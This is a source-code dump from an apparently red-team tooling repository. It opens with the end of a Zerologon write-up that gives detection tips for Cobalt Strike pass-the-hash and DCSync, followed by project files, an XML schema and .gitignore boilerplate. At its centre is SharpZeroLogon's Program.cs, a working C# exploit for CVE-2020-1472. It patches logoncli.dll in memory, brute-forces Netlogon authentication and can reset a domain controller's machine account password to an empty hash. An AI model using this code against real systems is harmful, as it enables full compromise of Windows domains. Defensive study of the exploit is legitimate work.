56 | * For detecting default `pth` usage in Cobalt Strike, look for command lines containing `/c echo` and `\\.\pipe\` together. Default Cobalt Strike also uses 11 hex characters for the echo argument, and 6 hex characters for the pipe name. This requires manually patching and is not easily configurable by the operator.
57 | * To detect DCSync usage, look for event ID 4662 containing the GUID `{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}`, which is the `DS-Replication-Get-Changes-All` extended right required for replication. Any replication from a non Domain Controller is suspicious. @James_inthe_box also provides [this Snort](https://gist.github.com/silence-is-best/25ae0929c277642e86ecf592598a3254) rule.
58 |
59 | # References
60 | * https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472
61 | * https://www.secura.com/blog/zero-logon
62 | * https://github.com/dirkjanm/CVE-2020-1472
63 | * https://twitter.com/gentilkiwi/status/1305659499991183361
64 | * https://twitter.com/gentilkiwi/status/1305975783781994498
65 | * https://github.com/gentilkiwi/mimikatz/commit/880c15994c4955d232f83cd2f73e5b6b1de165e7
66 |
--------------------------------------------------------------------------------
/Tools/Squeak/Squeak.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {B36CA995-B475-427F-B209-4E7F0835023D}
8 | WinExe
9 | Squeak
10 | Squeak
11 | v4.5
12 | 512
13 | {60dc8134-eba5-43b8-bcc9-bb4bc16c2548};{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}
14 | 4
15 | true
16 | true
17 |
18 |
19 |
20 | AnyCPU
21 | true
22 | full
23 | false
24 | bin\Debug\
25 | DEBUG;TRACE
26 | prompt
27 | 4
28 |
29 |
30 | AnyCPU
31 | pdbonly
32 | true
33 | bin\Release\
34 | TRACE
35 | prompt
36 | 4
37 |
38 |
39 | blacksquare.ico
40 |
41 |
42 |
43 | packages\AurelienRibon.Ui.SyntaxHighlightBox.2.0.2\lib\NET40\AurelienRibon.Ui.SyntaxHighlightBox.dll
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 | 4.0
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 | MSBuild:Compile
63 | Designer
64 |
65 |
66 | Designer
67 | MSBuild:Compile
68 |
69 |
70 | Designer
71 | MSBuild:Compile
72 |
73 |
74 | MSBuild:Compile
75 | Designer
76 |
77 |
78 | App.xaml
79 | Code
80 |
81 |
82 |
83 | Code.xaml
84 |
85 |
86 | Home.xaml
87 |
88 |
89 | MainWindow.xaml
90 | Code
91 |
92 |
93 |
94 |
95 | Code
96 |
97 |
98 | True
99 | True
100 | Resources.resx
101 |
102 |
103 | True
104 | Settings.settings
105 | True
106 |
107 |
108 | ResXFileCodeGenerator
109 | Resources.Designer.cs
110 |
111 |
112 |
113 | SettingsSingleFileGenerator
114 | Settings.Designer.cs
115 |
116 |
117 |
118 |
119 |
120 |
121 |
122 |
123 |
124 |
--------------------------------------------------------------------------------
/Tools/Squeak/Properties/Resources.resx:
--------------------------------------------------------------------------------
1 |
2 |
3 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 | text/microsoft-resx
107 |
108 |
109 | 2.0
110 |
111 |
112 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
113 |
114 |
115 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
116 |
117 |
--------------------------------------------------------------------------------
/Tools/Sigwhatever/Sigwhatever.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 | Debug
7 | AnyCPU
8 | {311F097D-17BF-418F-BEE7-BE15C1C93FF7}
9 | Exe
10 | Sigwhatever
11 | Sigwhatever
12 | v4.5.1
13 | 512
14 | true
15 | true
16 |
17 |
18 |
19 |
20 |
21 | AnyCPU
22 | true
23 | full
24 | false
25 | bin\Debug\
26 | DEBUG;TRACE
27 | prompt
28 | 4
29 | false
30 |
31 |
32 | AnyCPU
33 | pdbonly
34 | true
35 | bin\Release\
36 | TRACE
37 | prompt
38 | 4
39 | false
40 |
41 |
42 |
43 | packages\Costura.Fody.4.1.0\lib\net40\Costura.dll
44 |
45 |
46 | packages\HtmlAgilityPack.1.11.24\lib\Net45\HtmlAgilityPack.dll
47 |
48 |
49 | packages\Microsoft.Office.Interop.Outlook.15.0.4797.1003\lib\net20\Microsoft.Office.Interop.Outlook.dll
50 | True
51 |
52 |
53 | packages\Microsoft.Office.Interop.Word.15.0.4797.1003\lib\net20\Microsoft.Office.Interop.Word.dll
54 | True
55 |
56 |
57 | packages\NDesk.Options.0.2.1\lib\NDesk.Options.dll
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 | {58FBCF7C-E7A9-467C-80B3-FC65E8FCCA08}
92 | 1
93 | 0
94 | 0
95 | tlbimp
96 | False
97 | True
98 |
99 |
100 |
101 |
102 |
103 |
104 | This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.
105 |
106 |
107 |
108 |
109 |
--------------------------------------------------------------------------------
/Tools/SharpZeroLogon/SharpZeroLogon/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Diagnostics;
3 | using static SharpZeroLogon.Netapi32;
4 | using static SharpZeroLogon.Kernel32;
5 | using System.Runtime.InteropServices;
6 |
7 | namespace SharpZeroLogon
8 | {
9 | class Program
10 | {
11 | static int FindPattern(byte[] buf, byte[] pattern)
12 | {
13 | int start = 0;
14 | int end = buf.Length - pattern.Length;
15 | byte firstByte = pattern[0];
16 |
17 | while (start <= end)
18 | {
19 | if (buf[start] == firstByte)
20 | {
21 | for (int offset = 1; ; ++offset)
22 | {
23 | if (offset == pattern.Length)
24 | {
25 | return start;
26 | }
27 | else if (buf[start + offset] != pattern[offset])
28 | {
29 | break;
30 | }
31 | }
32 | }
33 | ++start;
34 | }
35 | return -1;
36 | }
37 |
38 | static bool PatchLogon()
39 | {
40 | // Patches logoncli.dll (x64) to use RPC over TCP/IP, making it work from non domain-joined
41 | // Credit to Benjamin Delpy @gentilkiwi for the neat trick!
42 | byte[] pattern = { 0xB8, 0x01, 0x00, 0x00, 0x00, 0x83, 0xF8, 0x01, 0x75, 0x3B };
43 |
44 | IntPtr hProc = Process.GetCurrentProcess().Handle;
45 | MODULEINFO modInfo = new MODULEINFO();
46 | IntPtr hModule = LoadLibrary("logoncli.dll");
47 |
48 | if (!GetModuleInformation(hProc, hModule, out modInfo, (uint)Marshal.SizeOf(modInfo)))
49 | return false;
50 |
51 | long addr = modInfo.lpBaseOfDll.ToInt64();
52 | long maxSize = addr + modInfo.SizeOfImage;
53 |
54 | while (addr < maxSize)
55 | {
56 | byte[] buf = new byte[1024];
57 | int bytesRead = 0;
58 | if (!ReadProcessMemory(hProc, addr, buf, 1024, ref bytesRead))
59 | return false;
60 |
61 | int index = FindPattern(buf, pattern);
62 | if (index > -1)
63 | {
64 | long patchAddr = addr + index + 1;
65 | if (!VirtualProtect(new IntPtr(patchAddr), 1024, 0x04, out uint oldProtect))
66 | return false;
67 |
68 | // patch mov eax 1; => mov eax, 2;
69 | Marshal.WriteByte(new IntPtr(patchAddr), 0x02);
70 |
71 | if (!VirtualProtect(new IntPtr(patchAddr), 1024, oldProtect, out oldProtect))
72 | return false;
73 | return true;
74 | }
75 | addr += 1024;
76 | }
77 | return false;
78 | }
79 |
80 | static void Main(string[] args)
81 | {
82 | if (args.Length < 1)
83 | {
84 | Console.WriteLine(" Usage: SharpZeroLogon.exe ");
85 | return;
86 | }
87 |
88 | bool reset = false;
89 | bool patch = false;
90 | string fqdn = args[0];
91 | string hostname = fqdn.Split('.')[0];
92 |
93 | foreach (string arg in args)
94 | {
95 | switch (arg)
96 | {
97 | case "-reset":
98 | reset = true;
99 | break;
100 | case "-patch":
101 | patch = true;
102 | break;
103 | }
104 | }
105 |
106 | if (patch)
107 | {
108 | if (!PatchLogon())
109 | {
110 | Console.WriteLine("Patching failed :(");
111 | return;
112 | }
113 | Console.WriteLine("Patch successful. Will use ncacn_ip_tcp");
114 | }
115 |
116 | NETLOGON_CREDENTIAL ClientChallenge = new NETLOGON_CREDENTIAL();
117 | NETLOGON_CREDENTIAL ServerChallenge = new NETLOGON_CREDENTIAL();
118 | ulong NegotiateFlags = 0x212fffff;
119 |
120 | Console.WriteLine("Performing authentication attempts...");
121 |
122 | for (int i = 0; i < 2000; i++)
123 | {
124 | if (I_NetServerReqChallenge(fqdn, hostname, ref ClientChallenge, ref ServerChallenge) != 0)
125 | {
126 | Console.WriteLine("Unable to complete server challenge. Possible invalid name or network issues?");
127 | return;
128 | }
129 | Console.Write("=");
130 |
131 | if (I_NetServerAuthenticate2(fqdn, hostname + "$", NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
132 | hostname, ref ClientChallenge, ref ServerChallenge, ref NegotiateFlags) == 0)
133 | {
134 | Console.WriteLine("\nSuccess! DC can be fully compromised by a Zerologon attack.");
135 |
136 | NETLOGON_AUTHENTICATOR authenticator = new NETLOGON_AUTHENTICATOR();
137 | NL_TRUST_PASSWORD ClearNewPassword = new NL_TRUST_PASSWORD();
138 |
139 | if (reset)
140 | {
141 | if (I_NetServerPasswordSet2(
142 | fqdn,
143 | hostname + "$",
144 | NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
145 | hostname,
146 | ref authenticator,
147 | out _,
148 | ref ClearNewPassword
149 | ) == 0)
150 | {
151 | Console.WriteLine("Done! Machine account password set to NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0");
152 | return;
153 | }
154 | Console.WriteLine("Failed to reset machine account password");
155 | }
156 |
157 | return;
158 | }
159 | }
160 | Console.WriteLine("\nAttack failed. Target is probably patched.");
161 | }
162 | }
163 | }
--------------------------------------------------------------------------------
/Tools/Sigwhatever/FodyWeavers.xsd:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 | A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks
13 |
14 |
15 |
16 |
17 | A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks.
18 |
19 |
20 |
21 |
22 | A list of unmanaged 32 bit assembly names to include, delimited with line breaks.
23 |
24 |
25 |
26 |
27 | A list of unmanaged 64 bit assembly names to include, delimited with line breaks.
28 |
29 |
30 |
31 |
32 | The order of preloaded assemblies, delimited with line breaks.
33 |
34 |
35 |
36 |
37 |
38 | This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file.
39 |
40 |
41 |
42 |
43 | Controls if .pdbs for reference assemblies are also embedded.
44 |
45 |
46 |
47 |
48 | Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option.
49 |
50 |
51 |
52 |
53 | As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off.
54 |
55 |
56 |
57 |
58 | Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code.
59 |
60 |
61 |
62 |
63 | Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior.
64 |
65 |
66 |
67 |
68 | A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with |
69 |
70 |
71 |
72 |
73 | A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |.
74 |
75 |
76 |
77 |
78 | A list of unmanaged 32 bit assembly names to include, delimited with |.
79 |
80 |
81 |
82 |
83 | A list of unmanaged 64 bit assembly names to include, delimited with |.
84 |
85 |
86 |
87 |
88 | The order of preloaded assemblies, delimited with |.
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 | 'true' to run assembly verification (PEVerify) on the target assembly after all weavers have been executed.
97 |
98 |
99 |
100 |
101 | A comma-separated list of error codes that can be safely ignored in assembly verification.
102 |
103 |
104 |
105 |
106 | 'false' to turn off automatic generation of the XML Schema file.
107 |
108 |
109 |
110 |
111 |
--------------------------------------------------------------------------------
/Tools/Sigwhatever/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Build results
17 | [Dd]ebug/
18 | [Dd]ebugPublic/
19 | [Rr]elease/
20 | [Rr]eleases/
21 | x64/
22 | x86/
23 | [Aa][Rr][Mm]/
24 | [Aa][Rr][Mm]64/
25 | bld/
26 | [Bb]in/
27 | [Oo]bj/
28 | [Ll]og/
29 |
30 | # Visual Studio 2015/2017 cache/options directory
31 | .vs/
32 | # Uncomment if you have tasks that create the project's static files in wwwroot
33 | #wwwroot/
34 |
35 | # Visual Studio 2017 auto generated files
36 | Generated\ Files/
37 |
38 | # MSTest test Results
39 | [Tt]est[Rr]esult*/
40 | [Bb]uild[Ll]og.*
41 |
42 | # NUNIT
43 | *.VisualState.xml
44 | TestResult.xml
45 |
46 | # Build Results of an ATL Project
47 | [Dd]ebugPS/
48 | [Rr]eleasePS/
49 | dlldata.c
50 |
51 | # Benchmark Results
52 | BenchmarkDotNet.Artifacts/
53 |
54 | # .NET Core
55 | project.lock.json
56 | project.fragment.lock.json
57 | artifacts/
58 |
59 | # StyleCop
60 | StyleCopReport.xml
61 |
62 | # Files built by Visual Studio
63 | *_i.c
64 | *_p.c
65 | *_h.h
66 | *.ilk
67 | *.meta
68 | *.obj
69 | *.iobj
70 | *.pch
71 | *.pdb
72 | *.ipdb
73 | *.pgc
74 | *.pgd
75 | *.rsp
76 | *.sbr
77 | *.tlb
78 | *.tli
79 | *.tlh
80 | *.tmp
81 | *.tmp_proj
82 | *_wpftmp.csproj
83 | *.log
84 | *.vspscc
85 | *.vssscc
86 | .builds
87 | *.pidb
88 | *.svclog
89 | *.scc
90 |
91 | # Chutzpah Test files
92 | _Chutzpah*
93 |
94 | # Visual C++ cache files
95 | ipch/
96 | *.aps
97 | *.ncb
98 | *.opendb
99 | *.opensdf
100 | *.sdf
101 | *.cachefile
102 | *.VC.db
103 | *.VC.VC.opendb
104 |
105 | # Visual Studio profiler
106 | *.psess
107 | *.vsp
108 | *.vspx
109 | *.sap
110 |
111 | # Visual Studio Trace Files
112 | *.e2e
113 |
114 | # TFS 2012 Local Workspace
115 | $tf/
116 |
117 | # Guidance Automation Toolkit
118 | *.gpState
119 |
120 | # ReSharper is a .NET coding add-in
121 | _ReSharper*/
122 | *.[Rr]e[Ss]harper
123 | *.DotSettings.user
124 |
125 | # JustCode is a .NET coding add-in
126 | .JustCode
127 |
128 | # TeamCity is a build add-in
129 | _TeamCity*
130 |
131 | # DotCover is a Code Coverage Tool
132 | *.dotCover
133 |
134 | # AxoCover is a Code Coverage Tool
135 | .axoCover/*
136 | !.axoCover/settings.json
137 |
138 | # Visual Studio code coverage results
139 | *.coverage
140 | *.coveragexml
141 |
142 | # NCrunch
143 | _NCrunch_*
144 | .*crunch*.local.xml
145 | nCrunchTemp_*
146 |
147 | # MightyMoose
148 | *.mm.*
149 | AutoTest.Net/
150 |
151 | # Web workbench (sass)
152 | .sass-cache/
153 |
154 | # Installshield output folder
155 | [Ee]xpress/
156 |
157 | # DocProject is a documentation generator add-in
158 | DocProject/buildhelp/
159 | DocProject/Help/*.HxT
160 | DocProject/Help/*.HxC
161 | DocProject/Help/*.hhc
162 | DocProject/Help/*.hhk
163 | DocProject/Help/*.hhp
164 | DocProject/Help/Html2
165 | DocProject/Help/html
166 |
167 | # Click-Once directory
168 | publish/
169 |
170 | # Publish Web Output
171 | *.[Pp]ublish.xml
172 | *.azurePubxml
173 | # Note: Comment the next line if you want to checkin your web deploy settings,
174 | # but database connection strings (with potential passwords) will be unencrypted
175 | *.pubxml
176 | *.publishproj
177 |
178 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
179 | # checkin your Azure Web App publish settings, but sensitive information contained
180 | # in these scripts will be unencrypted
181 | PublishScripts/
182 |
183 | # NuGet Packages
184 | *.nupkg
185 | # The packages folder can be ignored because of Package Restore
186 | **/[Pp]ackages/*
187 | # except build/, which is used as an MSBuild target.
188 | !**/[Pp]ackages/build/
189 | # Uncomment if necessary however generally it will be regenerated when needed
190 | #!**/[Pp]ackages/repositories.config
191 | # NuGet v3's project.json files produces more ignorable files
192 | *.nuget.props
193 | *.nuget.targets
194 |
195 | # Microsoft Azure Build Output
196 | csx/
197 | *.build.csdef
198 |
199 | # Microsoft Azure Emulator
200 | ecf/
201 | rcf/
202 |
203 | # Windows Store app package directories and files
204 | AppPackages/
205 | BundleArtifacts/
206 | Package.StoreAssociation.xml
207 | _pkginfo.txt
208 | *.appx
209 |
210 | # Visual Studio cache files
211 | # files ending in .cache can be ignored
212 | *.[Cc]ache
213 | # but keep track of directories ending in .cache
214 | !?*.[Cc]ache/
215 |
216 | # Others
217 | ClientBin/
218 | ~$*
219 | *~
220 | *.dbmdl
221 | *.dbproj.schemaview
222 | *.jfm
223 | *.pfx
224 | *.publishsettings
225 | orleans.codegen.cs
226 |
227 | # Including strong name files can present a security risk
228 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
229 | #*.snk
230 |
231 | # Since there are multiple workflows, uncomment next line to ignore bower_components
232 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
233 | #bower_components/
234 |
235 | # RIA/Silverlight projects
236 | Generated_Code/
237 |
238 | # Backup & report files from converting an old project file
239 | # to a newer Visual Studio version. Backup files are not needed,
240 | # because we have git ;-)
241 | _UpgradeReport_Files/
242 | Backup*/
243 | UpgradeLog*.XML
244 | UpgradeLog*.htm
245 | ServiceFabricBackup/
246 | *.rptproj.bak
247 |
248 | # SQL Server files
249 | *.mdf
250 | *.ldf
251 | *.ndf
252 |
253 | # Business Intelligence projects
254 | *.rdl.data
255 | *.bim.layout
256 | *.bim_*.settings
257 | *.rptproj.rsuser
258 | *- Backup*.rdl
259 |
260 | # Microsoft Fakes
261 | FakesAssemblies/
262 |
263 | # GhostDoc plugin setting file
264 | *.GhostDoc.xml
265 |
266 | # Node.js Tools for Visual Studio
267 | .ntvs_analysis.dat
268 | node_modules/
269 |
270 | # Visual Studio 6 build log
271 | *.plg
272 |
273 | # Visual Studio 6 workspace options file
274 | *.opt
275 |
276 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
277 | *.vbw
278 |
279 | # Visual Studio LightSwitch build output
280 | **/*.HTMLClient/GeneratedArtifacts
281 | **/*.DesktopClient/GeneratedArtifacts
282 | **/*.DesktopClient/ModelManifest.xml
283 | **/*.Server/GeneratedArtifacts
284 | **/*.Server/ModelManifest.xml
285 | _Pvt_Extensions
286 |
287 | # Paket dependency manager
288 | .paket/paket.exe
289 | paket-files/
290 |
291 | # FAKE - F# Make
292 | .fake/
293 |
294 | # JetBrains Rider
295 | .idea/
296 | *.sln.iml
297 |
298 | # CodeRush personal settings
299 | .cr/personal
300 |
301 | # Python Tools for Visual Studio (PTVS)
302 | __pycache__/
303 | *.pyc
304 |
305 | # Cake - Uncomment if you are using it
306 | # tools/**
307 | # !tools/packages.config
308 |
309 | # Tabs Studio
310 | *.tss
311 |
312 | # Telerik's JustMock configuration file
313 | *.jmconfig
314 |
315 | # BizTalk build output
316 | *.btp.cs
317 | *.btm.cs
318 | *.odx.cs
319 | *.xsd.cs
320 |
321 | # OpenCover UI analysis results
322 | OpenCover/
323 |
324 | # Azure Stream Analytics local run output
325 | ASALocalRun/
326 |
327 | # MSBuild Binary and Structured Log
328 | *.binlog
329 |
330 | # NVidia Nsight GPU debugger configuration file
331 | *.nvuser
332 |
333 | # MFractors (Xamarin productivity tool) working folder
334 | .mfractor/
335 |
336 | # Local History for Visual Studio
337 | .localhistory/
338 |
339 | # BeatPulse healthcheck temp database
340 | healthchecksdb
--------------------------------------------------------------------------------
/Tools/bof-vs-template/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Build results
17 | [Dd]ebug/
18 | [Dd]ebugPublic/
19 | [Rr]elease/
20 | [Rr]eleases/
21 | x64/
22 | x86/
23 | [Aa][Rr][Mm]/
24 | [Aa][Rr][Mm]64/
25 | bld/
26 | [Bb]in/
27 | [Oo]bj/
28 | [Ll]og/
29 |
30 | # Visual Studio 2015/2017 cache/options directory
31 | .vs/
32 | # Uncomment if you have tasks that create the project's static files in wwwroot
33 | #wwwroot/
34 |
35 | # Visual Studio 2017 auto generated files
36 | Generated\ Files/
37 |
38 | # MSTest test Results
39 | [Tt]est[Rr]esult*/
40 | [Bb]uild[Ll]og.*
41 |
42 | # NUNIT
43 | *.VisualState.xml
44 | TestResult.xml
45 |
46 | # Build Results of an ATL Project
47 | [Dd]ebugPS/
48 | [Rr]eleasePS/
49 | dlldata.c
50 |
51 | # Benchmark Results
52 | BenchmarkDotNet.Artifacts/
53 |
54 | # .NET Core
55 | project.lock.json
56 | project.fragment.lock.json
57 | artifacts/
58 |
59 | # StyleCop
60 | StyleCopReport.xml
61 |
62 | # Files built by Visual Studio
63 | *_i.c
64 | *_p.c
65 | *_h.h
66 | *.ilk
67 | *.meta
68 | *.obj
69 | *.iobj
70 | *.pch
71 | *.pdb
72 | *.ipdb
73 | *.pgc
74 | *.pgd
75 | *.rsp
76 | *.sbr
77 | *.tlb
78 | *.tli
79 | *.tlh
80 | *.tmp
81 | *.tmp_proj
82 | *_wpftmp.csproj
83 | *.log
84 | *.vspscc
85 | *.vssscc
86 | .builds
87 | *.pidb
88 | *.svclog
89 | *.scc
90 |
91 | # Chutzpah Test files
92 | _Chutzpah*
93 |
94 | # Visual C++ cache files
95 | ipch/
96 | *.aps
97 | *.ncb
98 | *.opendb
99 | *.opensdf
100 | *.sdf
101 | *.cachefile
102 | *.VC.db
103 | *.VC.VC.opendb
104 |
105 | # Visual Studio profiler
106 | *.psess
107 | *.vsp
108 | *.vspx
109 | *.sap
110 |
111 | # Visual Studio Trace Files
112 | *.e2e
113 |
114 | # TFS 2012 Local Workspace
115 | $tf/
116 |
117 | # Guidance Automation Toolkit
118 | *.gpState
119 |
120 | # ReSharper is a .NET coding add-in
121 | _ReSharper*/
122 | *.[Rr]e[Ss]harper
123 | *.DotSettings.user
124 |
125 | # JustCode is a .NET coding add-in
126 | .JustCode
127 |
128 | # TeamCity is a build add-in
129 | _TeamCity*
130 |
131 | # DotCover is a Code Coverage Tool
132 | *.dotCover
133 |
134 | # AxoCover is a Code Coverage Tool
135 | .axoCover/*
136 | !.axoCover/settings.json
137 |
138 | # Visual Studio code coverage results
139 | *.coverage
140 | *.coveragexml
141 |
142 | # NCrunch
143 | _NCrunch_*
144 | .*crunch*.local.xml
145 | nCrunchTemp_*
146 |
147 | # MightyMoose
148 | *.mm.*
149 | AutoTest.Net/
150 |
151 | # Web workbench (sass)
152 | .sass-cache/
153 |
154 | # Installshield output folder
155 | [Ee]xpress/
156 |
157 | # DocProject is a documentation generator add-in
158 | DocProject/buildhelp/
159 | DocProject/Help/*.HxT
160 | DocProject/Help/*.HxC
161 | DocProject/Help/*.hhc
162 | DocProject/Help/*.hhk
163 | DocProject/Help/*.hhp
164 | DocProject/Help/Html2
165 | DocProject/Help/html
166 |
167 | # Click-Once directory
168 | publish/
169 |
170 | # Publish Web Output
171 | *.[Pp]ublish.xml
172 | *.azurePubxml
173 | # Note: Comment the next line if you want to checkin your web deploy settings,
174 | # but database connection strings (with potential passwords) will be unencrypted
175 | *.pubxml
176 | *.publishproj
177 |
178 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
179 | # checkin your Azure Web App publish settings, but sensitive information contained
180 | # in these scripts will be unencrypted
181 | PublishScripts/
182 |
183 | # NuGet Packages
184 | *.nupkg
185 | # The packages folder can be ignored because of Package Restore
186 | **/[Pp]ackages/*
187 | # except build/, which is used as an MSBuild target.
188 | !**/[Pp]ackages/build/
189 | # Uncomment if necessary however generally it will be regenerated when needed
190 | #!**/[Pp]ackages/repositories.config
191 | # NuGet v3's project.json files produces more ignorable files
192 | *.nuget.props
193 | *.nuget.targets
194 |
195 | # Microsoft Azure Build Output
196 | csx/
197 | *.build.csdef
198 |
199 | # Microsoft Azure Emulator
200 | ecf/
201 | rcf/
202 |
203 | # Windows Store app package directories and files
204 | AppPackages/
205 | BundleArtifacts/
206 | Package.StoreAssociation.xml
207 | _pkginfo.txt
208 | *.appx
209 |
210 | # Visual Studio cache files
211 | # files ending in .cache can be ignored
212 | *.[Cc]ache
213 | # but keep track of directories ending in .cache
214 | !?*.[Cc]ache/
215 |
216 | # Others
217 | ClientBin/
218 | ~$*
219 | *~
220 | *.dbmdl
221 | *.dbproj.schemaview
222 | *.jfm
223 | *.pfx
224 | *.publishsettings
225 | orleans.codegen.cs
226 |
227 | # Including strong name files can present a security risk
228 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
229 | #*.snk
230 |
231 | # Since there are multiple workflows, uncomment next line to ignore bower_components
232 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
233 | #bower_components/
234 |
235 | # RIA/Silverlight projects
236 | Generated_Code/
237 |
238 | # Backup & report files from converting an old project file
239 | # to a newer Visual Studio version. Backup files are not needed,
240 | # because we have git ;-)
241 | _UpgradeReport_Files/
242 | Backup*/
243 | UpgradeLog*.XML
244 | UpgradeLog*.htm
245 | ServiceFabricBackup/
246 | *.rptproj.bak
247 |
248 | # SQL Server files
249 | *.mdf
250 | *.ldf
251 | *.ndf
252 |
253 | # Business Intelligence projects
254 | *.rdl.data
255 | *.bim.layout
256 | *.bim_*.settings
257 | *.rptproj.rsuser
258 | *- Backup*.rdl
259 |
260 | # Microsoft Fakes
261 | FakesAssemblies/
262 |
263 | # GhostDoc plugin setting file
264 | *.GhostDoc.xml
265 |
266 | # Node.js Tools for Visual Studio
267 | .ntvs_analysis.dat
268 | node_modules/
269 |
270 | # Visual Studio 6 build log
271 | *.plg
272 |
273 | # Visual Studio 6 workspace options file
274 | *.opt
275 |
276 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
277 | *.vbw
278 |
279 | # Visual Studio LightSwitch build output
280 | **/*.HTMLClient/GeneratedArtifacts
281 | **/*.DesktopClient/GeneratedArtifacts
282 | **/*.DesktopClient/ModelManifest.xml
283 | **/*.Server/GeneratedArtifacts
284 | **/*.Server/ModelManifest.xml
285 | _Pvt_Extensions
286 |
287 | # Paket dependency manager
288 | .paket/paket.exe
289 | paket-files/
290 |
291 | # FAKE - F# Make
292 | .fake/
293 |
294 | # JetBrains Rider
295 | .idea/
296 | *.sln.iml
297 |
298 | # CodeRush personal settings
299 | .cr/personal
300 |
301 | # Python Tools for Visual Studio (PTVS)
302 | __pycache__/
303 | *.pyc
304 |
305 | # Cake - Uncomment if you are using it
306 | # tools/**
307 | # !tools/packages.config
308 |
309 | # Tabs Studio
310 | *.tss
311 |
312 | # Telerik's JustMock configuration file
313 | *.jmconfig
314 |
315 | # BizTalk build output
316 | *.btp.cs
317 | *.btm.cs
318 | *.odx.cs
319 | *.xsd.cs
320 |
321 | # OpenCover UI analysis results
322 | OpenCover/
323 |
324 | # Azure Stream Analytics local run output
325 | ASALocalRun/
326 |
327 | # MSBuild Binary and Structured Log
328 | *.binlog
329 |
330 | # NVidia Nsight GPU debugger configuration file
331 | *.nvuser
332 |
333 | # MFractors (Xamarin productivity tool) working folder
334 | .mfractor/
335 |
336 | # Local History for Visual Studio
337 | .localhistory/
338 |
339 | # BeatPulse healthcheck temp database
340 | healthchecksdb
--------------------------------------------------------------------------------
/Tools/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Build results
17 | [Dd]ebug/
18 | [Dd]ebugPublic/
19 | [Rr]elease/
20 | [Rr]eleases/
21 | x64/
22 | x86/
23 | [Aa][Rr][Mm]/
24 | [Aa][Rr][Mm]64/
25 | bld/
26 | [Bb]in/
27 | [Oo]bj/
28 | [Ll]og/
29 |
30 | # Visual Studio 2015/2017 cache/options directory
31 | .vs/
32 | # Uncomment if you have tasks that create the project's static files in wwwroot
33 | #wwwroot/
34 |
35 | # Visual Studio 2017 auto generated files
36 | Generated\ Files/
37 |
38 | # MSTest test Results
39 | [Tt]est[Rr]esult*/
40 | [Bb]uild[Ll]og.*
41 |
42 | # NUNIT
43 | *.VisualState.xml
44 | TestResult.xml
45 |
